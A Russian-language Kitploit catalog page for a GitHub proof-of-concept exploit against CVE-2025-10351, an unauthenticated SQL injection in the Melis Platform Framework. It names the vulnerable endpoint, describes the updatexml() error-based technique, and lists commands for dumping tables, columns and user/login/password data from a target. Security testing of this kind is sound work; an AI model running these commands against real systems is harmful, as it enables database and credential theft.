Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-10351-POC — Эксплойт для CVE-2025-10351. SQL Injection на Melis Platform Framework. | Kitploit
Инструменты/GitHubGitHub/ivansmc/cve-2025-10351-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеБезопасность Баз Данных
GitHubivansmc/cve-2025-10351-poc

CVE-2025-10351-POC

Эксплойт для CVE-2025-10351. SQL Injection на Melis Platform Framework.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-10351 POC - Эксплойт SQL-инъекции 💉

POC для CVE-2025-10351: Неаутентифицированная уязвимость SQL-инъекции, затрагивающая определенную конечную точку в платформе Melis Platform Framework.

status python status


🔗 Ссылки

  • 📄 CVE-2025-10351 на MITRE
  • 📄 Предупреждение о платформе Melis на INCIBE (Национальный институт кибербезопасности Испании)

🚀 Описание

Этот POC предназначен для эксплуатации уязвимости неаутентифицированной error-based SQL-инъекции в конечной точке:

root@kitploit:~
melis/MelisCms/PageEdition/getTinyTemplates?idPage=

Он использует updatexml() в MySQL для извлечения:

  • Имен таблиц
  • Имен столбцов
  • Данных из конкретных или всех столбцов

Также обнаруживает возможные векторы time-based SQLi для дальнейшей ручной эксплуатации.


🛠️ Требования

Установите зависимости с помощью:

root@kitploit:~
pip3 install -r requirements.txt

🧪 Использование

Базовая проверка

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80

Из списка URL

root@kitploit:~
python3 CVE-2025-10351-POC.py -l targets.txt

Извлечь все имена таблиц

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at

Извлечь все имена столбцов из таблицы

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users

Извлечь все данные из всех столбцов

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac

Извлечь конкретные столбцы

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password

Использование прокси с небезопасным режимом, cookies и режимом отладки

root@kitploit:~
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug

⚙️ Параметры


📤 Вывод

  • Извлеченные таблицы сохранены в tables_extracted.txt
  • Извлеченные данные сохранены в <table_name>_data.txt

⚠️ Отказ от ответственности

Этот документ предназначен только для авторизованного тестирования безопасности и устранения уязвимостей. Не используйте PoC или шаги воспроизведения против систем, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения. Автор не несет ответственности за неправомерное использование.


Сделано с ❤️ Manuel Iván San Martín Castillo

Скачать инструмент
АргументОписание
-uЦелевой URL
-pПорт (80, 443 и т.д.)
-lФайл со списком URL
-sВремя ожидания для time-based тестов (по умолчанию: 1с)
-atДамп всех имен таблиц
-tУказать имя таблицы
-acДамп всех столбцов указанной таблицы
-cСписок столбцов для дампа через запятую
--proxyBurp Proxy http://127.0.0.1:8080
--insecureОтключить проверку TLS при использовании прокси-соединений
--cookieCookies для авторизованных запросов
--debugРежим отладки